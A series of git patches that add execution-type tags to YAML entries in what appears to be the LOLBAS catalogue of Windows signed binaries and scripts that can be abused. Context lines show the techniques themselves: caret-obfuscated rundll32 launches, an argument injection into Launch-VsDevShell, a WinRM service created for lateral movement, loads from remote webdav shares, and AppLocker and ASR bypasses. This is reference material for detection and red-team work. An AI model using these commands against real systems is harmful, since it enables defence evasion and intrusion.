@@ -21,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows Tags: - - Input: INF + - Execute: INF Full_Path: - Path: c:\windows\system32\setupapi.dll - Path: c:\windows\syswow64\setupapi.dll From a28f2a756ab5bc90ca5e87ac42518d6ff494c8ef Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:26:39 +0200 Subject: [PATCH 086/148] Update Shdocvw.yml Tags Added Tags: Execute EXE --- yml/OSLibraries/Shdocvw.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index e7ab9a08..7514068c 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll From eb9dfdee1791c9749a533b9b0af24a99e00ceccf Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:27:37 +0200 Subject: [PATCH 087/148] Update Shell32.yml Tags Added Tags: Execute EXE Execute CMD --- yml/OSLibraries/Shell32.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 97e10ab8..48488674 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -20,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. @@ -27,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll From 7533fea6b631d883af2c986bd3cdf35ff0a70ac3 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:28:39 +0200 Subject: [PATCH 088/148] Update Syssetup.yml Tags Changed Input: INF to Execute: INFO for consistency --- yml/OSLibraries/Syssetup.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index ac5cce27..3b01659c 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Usecase: Load an executable payload. @@ -21,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF Full_Path: - Path: c:\windows\system32\syssetup.dll - Path: c:\windows\syswow64\syssetup.dll From 5a169e4d600bf47e78274cee8797186614f03bec Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:32:25 +0200 Subject: [PATCH 089/148] Update Url.yml Tags Added Tags: Execute HTA Execute EXE --- yml/OSLibraries/Url.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 8e7a0702..29b58e9f 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: HTA - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file with or without quotes. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe Description: Launch an executable by calling FileProtocolHandler. Usecase: Launch an executable. @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling FileProtocolHandler. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). @@ -39,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Description: Launch a HTML application payload by calling FileProtocolHandler. Usecase: Invoke an HTML Application via mshta.exe (Default Handler). @@ -46,6 +56,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: HTA Full_Path: - Path: c:\windows\system32\url.dll - Path: c:\windows\syswow64\url.dll From 9ebae9a6fbb4d294a87e229c2e576b0dd22be2b7 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:34:26 +0200 Subject: [PATCH 090/148] Update Zipfldr.yml Tags Added Tags Execute EXE --- yml/OSLibraries/Zipfldr.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index e107b5e6..a7c1355d 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable payload by calling RouteTheCall (obfuscated). Usecase: Launch an executable. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll From 1f57c1484503ffa4a8af6abedd09052ca28f3f03 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:44:40 +0200 Subject: [PATCH 091/148] Update CL_LoadAssembly.yml Tags Changed DLL to .NetDLL --- yml/OSScripts/CL_LoadAssembly.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 4298de42..250f1009 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: DLL + - Execute: .NetDLL Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 Code_Sample: From cb73a1cfd01be67b89d8910591690529e0dd633a Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:47:36 +0200 Subject: [PATCH 092/148] Update CL_mutexverifiers.yml tags added tags: Execute: powershell --- yml/OSScripts/CL_mutexverifiers.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 37099e57..27cbea78 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10 + Tags: + - Execute: Powershell Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 From 4c232b06fe02c4f1ad9224bc76f4d4f0b7d2c213 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:52:43 +0200 Subject: [PATCH 093/148] Update Cl_invocation.yml Tags Added Tags: Execute EXE Execute CMD --- yml/OSScripts/Cl_invocation.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index c7b884d2..783eea71 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10 + Tags: + - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 From a7b0dfcf5eb6d73f6bcd022ab7f0b73c4567c446 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:53:59 +0200 Subject: [PATCH 094/148] Update Launch-VsDevShell.yml Tags Added Tags Execute EXE --- yml/OSScripts/Launch-VsDevShell.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSScripts/Launch-VsDevShell.yml b/yml/OSScripts/Launch-VsDevShell.yml index d5bb9b2a..72d32fb0 100644 --- a/yml/OSScripts/Launch-VsDevShell.yml +++ b/yml/OSScripts/Launch-VsDevShell.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; calc.exe ;"' Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag. Usecase: Proxy execution @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1 - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1 From 4295f690a1e340e29be02b0522709b6e41dd0345 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:56:48 +0200 Subject: [PATCH 095/148] Update Manage-bde.yml Tags Added Tags: Execute EXE --- yml/OSScripts/Manage-bde.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index cf3c4b7f..4b1441c1 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. Usecase: Proxy execution from script @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\manage-bde.wsf Code_Sample: From 8673165d4b46aa4b4f0b8f1cc094bdbd775a8148 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 20:18:06 +0200 Subject: [PATCH 096/148] Update Pubprn.yml Tags Added Tags: Execute SCT --- yml/OSScripts/Pubprn.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index d913b862..18985ac4 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216.001 OperatingSystem: Windows 10 + Tags: + - Execute: SCT Full_Path: - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs From 66510df000735d44e31200a31cee860def955962 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 20:18:52 +0200 Subject: [PATCH 097/148] Update Syncappvpublishingserver.yml Tags Added Tags: Execute: Powershell --- yml/OSScripts/Syncappvpublishingserver.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index 64ef7b93..10e39e50 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216.002 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Powershell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs Detection: From ac7ac2af006162e71a5e0ff267ec9f9df57af689 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 20:19:59 +0200 Subject: [PATCH 098/148] Update UtilityFunctions.yml Tags Changed Execute DLL to Execute .NetDLL --- yml/OSScripts/UtilityFunctions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 26109da6..5e16964e 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: DLL + - Execute: .NetDLL Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 Code_Sample: From 76060761ae6c2049611b044d50466db076964f38 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 20:21:46 +0200 Subject: [PATCH 099/148] Update Winrm.yml Tags Added Tags: Execute: CMD Execute: Remote --- yml/OSScripts/Winrm.yml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index ecfee7e2..5f0e1564 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution @@ -18,6 +21,9 @@ Commands: Privileges: Admin MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe. Usecase: Execute arbitrary, unsigned code via XSL script @@ -25,6 +31,9 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs From 43ae6c8a1b9b9a8ace0d8e2b528d2d3d1c99d9df Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 20:23:33 +0200 Subject: [PATCH 100/148] Update pester.yml Tags and removed duplicate Removed Duplicate Command field Added Tags: - Execute EXE --- yml/OSScripts/pester.yml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 237afa95..c8b1d9f5 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: Pester.bat ;calc.exe Description: Execute code using Pester. Example here executes calc.exe Usecase: Proxy execution @@ -18,13 +20,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - - Command: Pester.bat ;calc.exe - Description: Execute code using Pester. Example here executes calc.exe - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\\bin\Pester.bat Code_Sample: From c9f0857f0fdbffdeef4f3389440b55b39e2bb84f Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 20:24:41 +0200 Subject: [PATCH 101/148] Update CL_mutexverifiers.yml: Identation change --- yml/OSScripts/CL_mutexverifiers.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 27cbea78..59a4a8c3 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 Tags: - - Execute: Powershell + - Execute: Powershell Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 From 16d84e33e689b2f12d5d377d97750af94ca12480 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:17:55 +0200 Subject: [PATCH 102/148] Update AccCheckConsole.yml Tags Changed DLL to .NetDLL --- yml/OtherMSBinaries/AccCheckConsole.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index be527dad..40140642 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: DLL + - Execute: .NetDLL - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code to bypass AppLocker. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: DLL + - Execute: .NetDLL Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe From a01bab762ef21447a0b3ae62468c27df143b3a47 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:21:32 +0200 Subject: [PATCH 103/148] Update Adplus.yml Tags Changed Tags: - Execute CMD - Execute EXE --- yml/OtherMSBinaries/Adplus.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index 006c8b4d..142ad7a7 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -18,6 +18,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: All Windows + Tags: + - Execute: CMD - Command: adplus.exe -c config-adplus.xml Description: Dump process memory using adplus config file (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary @@ -32,6 +34,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: All windows + Tags: + - Execute: CMD + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe From 8fc69956788bed2b3496b2161b1d1ef8b8cb157c Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:23:22 +0200 Subject: [PATCH 104/148] Update Agentexecutor.yml Tags Added Tags: Execute Powershell Execute EXE --- yml/OtherMSBinaries/Agentexecutor.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index 8bb87dc5..3517a54f 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: Powershell - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully Usecase: Execute a provided EXE @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe Code_Sample: From f4cd4d0bd1b8db6f67c783f716874c1b2c5ab071 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:25:16 +0200 Subject: [PATCH 105/148] Update Appcert.yml Tags Added Tags: Execute EXE Execute MSI --- yml/OtherMSBinaries/Appcert.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Appcert.yml b/yml/OtherMSBinaries/Appcert.yml index 30b817ba..a423ff30 100644 --- a/yml/OtherMSBinaries/Appcert.yml +++ b/yml/OtherMSBinaries/Appcert.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process. Usecase: Execute custom made MSI file with malicious code @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218.007 OperatingSystem: Windows + Tags: + - Execute: MSI Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe - Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe From e4f73cfafac8b027ede7ea8edf7d79e2d1057868 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:35:16 +0200 Subject: [PATCH 106/148] Update Appvlp.yml Tags Added Tags: Execute CMD Execute EXE --- yml/OtherMSBinaries/Appvlp.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index 54678dbd..620916d6 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 + Tags: + - Execute: CMD - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 + Tags: + - Execute: EXE - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe From 351a3bcac66dd8cfaa5d4fb23378fb057eb270fa Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:36:52 +0200 Subject: [PATCH 107/148] Update Bginfo.yml Tags Added Tag: Execute: Remote --- yml/OtherMSBinaries/Bginfo.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index 386361e1..c61401a8 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -49,6 +49,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH + - Execute: Remote - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. @@ -58,6 +59,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH + - Execute: Remote Full_Path: - Path: no default Detection: From 37eaa488d17001cba19c3d212a11bed1bd514f50 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:42:37 +0200 Subject: [PATCH 108/148] Update Cdb.yml Tags Added Tags: Execute: CMD Execute: Shellcode --- yml/OtherMSBinaries/Cdb.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 290e847c..87aa504e 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: Shellcode - Command: | cdb.exe -pd -pn .shell @@ -20,6 +22,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CMD - Command: cdb.exe -c C:\debug-script.txt calc Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary @@ -27,6 +31,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe From edf0105284abd47530d3bed3e125b616ea7577e6 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:43:38 +0200 Subject: [PATCH 109/148] Update Coregen.yml Tags Added Execute: DLL tag --- yml/OtherMSBinaries/Coregen.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml index b2fb1f74..7bbacc26 100644 --- a/yml/OtherMSBinaries/Coregen.yml +++ b/yml/OtherMSBinaries/Coregen.yml @@ -20,6 +20,8 @@ Commands: Privileges: User MitreID: T1055 OperatingSystem: Windows + Tags: + - Execute: DLL - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions. Usecase: Execute DLL code From 83c34ff627fa405f18f07e884509d6840af0c2a4 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 21:56:45 +0200 Subject: [PATCH 110/148] Update Csi.yml Tags Added Tags: Execute: C# --- yml/OtherMSBinaries/Csi.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 991c1bde..939eb1cc 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -11,6 +11,7 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 